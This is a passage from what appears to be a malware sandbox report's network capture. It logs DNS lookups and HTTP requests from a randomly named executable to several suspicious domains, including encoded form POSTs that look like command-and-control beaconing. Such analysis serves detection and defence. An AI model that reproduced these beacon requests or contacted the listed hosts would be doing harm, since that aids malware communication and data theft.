                                                            Jan 11, 2025 05:45:12.382040024 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:12.386900902 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:12.387001991 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:12.402044058 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:12.407120943 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:13.010396004 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:13.012207031 CET8050006104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:13.012281895 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:13.913764954 CET5000680192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.933392048 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.938335896 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:14.938457012 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.956047058 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:14.960926056 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.557960987 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.558871031 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.558938980 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:15.559007883 CET8050007104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:15.559057951 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:16.478173018 CET5000780192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.495146036 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.500082016 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:17.500154018 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.516024113 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:17.520889997 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:17.520910978 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:18.138160944 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:18.139532089 CET8050008104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:18.139702082 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:19.023262024 CET5000880192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.043080091 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.048276901 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.048362017 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.058527946 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.063416004 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.653219938 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.654582977 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.654632092 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:20.654742002 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.654825926 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.659744024 CET5000980192.168.2.10104.21.48.233
                                                            Jan 11, 2025 05:45:20.664612055 CET8050009104.21.48.233192.168.2.10
                                                            Jan 11, 2025 05:45:25.690651894 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:25.695604086 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:25.695674896 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:25.710680962 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:25.715528965 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366406918 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366444111 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366482019 CET80500103.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:26.366691113 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:27.226263046 CET5001080192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.809264898 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.814460993 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:28.820091009 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.833187103 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:28.838169098 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508373022 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508429050 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508447886 CET80500113.252.97.86192.168.2.10
                                                            Jan 11, 2025 05:45:29.508511066 CET5001180192.168.2.103.252.97.86
                                                            Jan 11, 2025 05:45:29.508598089 CET5001180192.168.2.103.252.97.86

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 11, 2025 05:43:25.267860889 CET6501253192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:43:25.288018942 CET53650121.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:43:41.322546959 CET5078553192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:43:41.447616100 CET53507851.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:43:49.511753082 CET5690753192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:43:49.618021965 CET53569071.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:02.994678020 CET5116053192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:03.398760080 CET53511601.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:17.010364056 CET5136253192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:17.835716009 CET53513621.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:31.370593071 CET5411853192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:31.525178909 CET53541181.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:44.823456049 CET6312353192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:44.830482960 CET53631231.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:44:58.698283911 CET5735553192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:44:58.842771053 CET53573551.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:45:12.370701075 CET6089653192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:45:12.379635096 CET53608961.1.1.1192.168.2.10
                                                            Jan 11, 2025 05:45:25.677390099 CET5066753192.168.2.101.1.1.1
                                                            Jan 11, 2025 05:45:25.688584089 CET53506671.1.1.1192.168.2.10

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 11, 2025 05:43:25.267860889 CET192.168.2.101.1.1.10xda13Standard query (0)www.pbfgm.xyzA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:43:41.322546959 CET192.168.2.101.1.1.10xad86Standard query (0)www.phdcoach.proA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:43:49.511753082 CET192.168.2.101.1.1.10xa57fStandard query (0)www.elinor.clubA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:02.994678020 CET192.168.2.101.1.1.10xbebcStandard query (0)www.smalleyes.icuA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:17.010364056 CET192.168.2.101.1.1.10x623aStandard query (0)www.btblxhh.topA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:31.370593071 CET192.168.2.101.1.1.10xccefStandard query (0)www.primespot.liveA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:44.823456049 CET192.168.2.101.1.1.10xfdf9Standard query (0)www.mohawktooldie.onlineA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:58.698283911 CET192.168.2.101.1.1.10x5b3eStandard query (0)www.graviton.energyA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:45:12.370701075 CET192.168.2.101.1.1.10x404eStandard query (0)www.ausyva4.topA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:45:25.677390099 CET192.168.2.101.1.1.10xf945Standard query (0)www.e8af.xyzA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 11, 2025 05:43:25.288018942 CET1.1.1.1192.168.2.100xda13No error (0)www.pbfgm.xyz104.21.86.111A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:43:25.288018942 CET1.1.1.1192.168.2.100xda13No error (0)www.pbfgm.xyz172.67.218.146A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:43:41.447616100 CET1.1.1.1192.168.2.100xad86Name error (3)www.phdcoach.prononenoneA (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:43:49.618021965 CET1.1.1.1192.168.2.100xa57fNo error (0)www.elinor.club194.58.112.174A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:03.398760080 CET1.1.1.1192.168.2.100xbebcNo error (0)www.smalleyes.icu134.122.191.187A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:17.835716009 CET1.1.1.1192.168.2.100x623aNo error (0)www.btblxhh.top156.234.28.101A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:31.525178909 CET1.1.1.1192.168.2.100xccefNo error (0)www.primespot.live209.74.79.42A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:44.830482960 CET1.1.1.1192.168.2.100xfdf9No error (0)www.mohawktooldie.online208.91.197.27A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:44:58.842771053 CET1.1.1.1192.168.2.100x5b3eNo error (0)www.graviton.energy185.101.158.113A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:45:12.379635096 CET1.1.1.1192.168.2.100x404eNo error (0)www.ausyva4.top104.21.48.233A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:45:12.379635096 CET1.1.1.1192.168.2.100x404eNo error (0)www.ausyva4.top172.67.188.88A (IP address)IN (0x0001)false
                                                            Jan 11, 2025 05:45:25.688584089 CET1.1.1.1192.168.2.100xf945No error (0)www.e8af.xyz3.252.97.86A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.pbfgm.xyz
                                                            • www.elinor.club
                                                            • www.smalleyes.icu
                                                            • www.btblxhh.top
                                                            • www.primespot.live
                                                            • www.mohawktooldie.online
                                                            • www.graviton.energy
                                                            • www.ausyva4.top
                                                            • www.e8af.xyz

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1049980104.21.86.111806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:43:25.310283899 CET538OUTGET /fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.pbfgm.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:43:26.279676914 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:43:26 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BT9j5wwI%2FnJbbeybh1Tzn7pNMs0Ulef8TNyLEgKtg2pmK3VpUv7RZ0ehe1Bt0oLSAyaCIcPhKJlSLvqRKmMN4%2BZOdVPgKuK%2Fik%2BuvAJaemgVZ71hJ1qGAzWAL0wa0w03"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 90023eedbe44430f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                            Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
                                                            Jan 11, 2025 05:43:26.279706001 CET92INData Raw: 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d
                                                            Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1049982194.58.112.174806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:43:49.641447067 CET798OUTPOST /1ne4/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.elinor.club
                                                            Origin: http://www.elinor.club
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.elinor.club/1ne4/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 45 6c 6f 4e 72 75 42 61 4e 34 45 4c 5a 66 67 7a 54 37 64 35 67 46 39 47 31 79 49 51 38 65 5a 49 43 4b 58 41 76 68 61 4e 31 44 4d 56 4c 65 35 57 4b 56 51 56 49 49 6f 63 5a 53 4e 57 30 56 41 76 72 32 2b 6e 35 6a 6c 70 78 42 5a 72 6e 71 2b 77 2b 54 4c 6c 31 45 43 79 4a 4b 57 5a 2b 35 30 49 47 43 61 72 58 45 39 44 37 36 37 45 4d 55 37 47 52 58 32 74 42 33 48 6b 4b 51 55 50 65 48 45 64 49 38 43 57 6b 56 4e 63 37 4d 4e 77 70 73 5a 49 45 45 49 58 4f 74 62 35 52 52 67 42 45 50 47 6d 65 42 42 4b 57 66 35 4a 74 6a 58 53 4a 72 77 4d
                                                            Data Ascii: rFbdy=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXOtb5RRgBEPGmeBBKWf5JtjXSJrwM
                                                            Jan 11, 2025 05:43:50.307732105 CET341INHTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1049983194.58.112.174806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:43:52.186640024 CET822OUTPOST /1ne4/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.elinor.club
                                                            Origin: http://www.elinor.club
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.elinor.club/1ne4/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 46 45 59 4e 70 4a 56 61 4b 59 45 49 57 2f 67 7a 64 62 64 48 67 46 35 47 31 7a 4d 36 38 4e 39 49 43 72 6e 41 75 67 61 4e 79 44 4d 56 66 4f 35 58 56 6c 51 4f 49 49 6b 75 5a 53 68 57 30 56 45 76 72 79 36 6e 35 55 52 6d 33 52 5a 70 38 61 2b 79 36 54 4c 6c 31 45 43 79 4a 4b 71 7a 2b 39 67 49 46 7a 71 72 47 56 39 41 67 61 37 4c 4e 55 37 47 61 33 32 70 42 33 48 38 4b 55 4d 70 65 45 73 64 49 35 6d 57 6e 42 52 64 73 38 4d 37 33 63 59 73 48 55 68 66 48 4d 6a 30 66 78 67 43 56 49 32 39 5a 67 38 4e 48 4f 59 65 2b 55 4c 63 48 74 46 6d 34 39 51 6d 62 78 67 62 46 43 63 2f 56 63 75 37 7a 67 76 4e 2f 67 3d 3d
                                                            Data Ascii: rFbdy=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N9ICrnAugaNyDMVfO5XVlQOIIkuZShW0VEvry6n5URm3RZp8a+y6TLl1ECyJKqz+9gIFzqrGV9Aga7LNU7Ga32pB3H8KUMpeEsdI5mWnBRds8M73cYsHUhfHMj0fxgCVI29Zg8NHOYe+ULcHtFm49QmbxgbFCc/Vcu7zgvN/g==
                                                            Jan 11, 2025 05:43:52.866033077 CET341INHTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.1049984194.58.112.174806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:43:54.740983009 CET1835OUTPOST /1ne4/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.elinor.club
                                                            Origin: http://www.elinor.club
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.elinor.club/1ne4/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Raw: 72 46 62 64 79 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 46 45 59 4e 70 4a 56 61 4b 59 45 49 57 2f 67 7a 64 62 64 48 67 46 35 47 31 7a 4d 36 38 4e 31 49 44 5a 66 41 76 44 79 4e 7a 44 4d 56 44 2b 35 4b 56 6c 52 57 49 4c 56 6c 5a 53 64 73 30 58 4d 76 72 58 75 6e 2f 68 39 6d 2b 52 5a 70 6a 71 2b 2f 2b 54 4c 77 31 45 79 2b 4a 4c 47 7a 2b 39 67 49 46 78 69 72 47 45 39 41 69 61 37 45 4d 55 37 61 52 58 32 42 42 33 76 73 4b 55 59 66 66 30 4d 64 4a 5a 32 57 33 69 35 64 75 63 4d 35 32 63 59 30 48 55 39 51 48 4d 2b 46 66 79 38 73 56 4f 47 39 61 55 38 58 59 74 41 2f 74 6b 72 48 41 73 35 39 32 34 45 41 62 42 4a 4d 54 6e 52 67 4f 75 75 73 7a 52 47 79 74 74 70 72 4f 5a 64 72 58 6f 53 6c 71 48 54 32 38 32 2f 2f 49 6a 48 63 74 39 51 73 4d 6b 63 67 61 63 37 73 72 4a 36 55 53 71 68 6b 2b 66 4c 58 71 78 4d 75 50 44 64 6f 42 6c 70 65 39 44 75 65 55 67 46 4e 4b 6b 38 51 6c 38 52 66 4a 6f 37 62 5a 57 48 32 50 45 4f 68 50 45 4a 56 49 69 69 6c 66 64 4b 2b 56 4a 71 54 64 4e 51 4e 4f 45 4a 66 32 71 37 31 36 50 31 50 76 37 6c 66 [TRUNCATED]
                                                            Data Ascii: rFbdy=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N1IDZfAvDyNzDMVD+5KVlRWILVlZSds0XMvrXun/h9m+RZpjq+/+TLw1Ey+JLGz+9gIFxirGE9Aia7EMU7aRX2BB3vsKUYff0MdJZ2W3i5ducM52cY0HU9QHM+Ffy8sVOG9aU8XYtA/tkrHAs5924EAbBJMTnRgOuuszRGyttprOZdrXoSlqHT282//IjHct9QsMkcgac7srJ6USqhk+fLXqxMuPDdoBlpe9DueUgFNKk8Ql8RfJo7bZWH2PEOhPEJVIiilfdK+VJqTdNQNOEJf2q716P1Pv7lfHBsQc6c42f0DerBkGbDsAmWnx5gZ8e00Ni9eiWUB2PbpQ3ka7zozybae0ZE+e712qbXXkVzDAJJgRvocDjdWXyJZLQ9iDL8Itpc6I3MiHpDYHWARaLmVhpxPQNJ4Lv8S2FoPR8D/e+jp2IoVilFmv0duuL+C8xjQWNpmeAqlFRRRYEFQ3y/W8BnEY7Wo5YHoofdsvOkfMLqjqYjrbIDG4nTSCrMBN6w7IrWKmIo8ixobbNQNIcyKn90FLkcdxYDkdXuQyNzVTHxWCXdXjKIdL6Y946V5mSYMjfqx/79Q0bn5Vvc/zjV2Kgz5nXxeWYmR94blLER1kEW+g/oMQpiJSyFTLiJE2aLxOhtv7D6IBLB1ggazpb7YWOOS5txcBJI8sEEA9q66KULHusm1Q4w+35hlCHC8U6ZPk0n02cy9FJRFRdCI0rxhx0wNDSebKI0wlFabZSzCmuNWQcidPMhwc62hLDzDEqOrF2fz1Lfh1eyPg2EGiXw+r5Rh9c6V9rU6FqsRaPasrIoPWK6iOZJGnhSKNRg/L3aG+x1mtpkAtKHbMQsERtmT+0PKh55Tc7rMnDrv6SLjI3rU8H1WYlbrgtaZo5LyXOH9NX8p2upsg875rPBcJ8Mb++Nzq5k/ndO5uHEJ0AURM2anUYY+IOfl3G1qLyO/+AhNHh [TRUNCATED]
                                                            Jan 11, 2025 05:43:55.424272060 CET341INHTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.1049985194.58.112.174806336C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            TimestampBytes transferredDirectionData
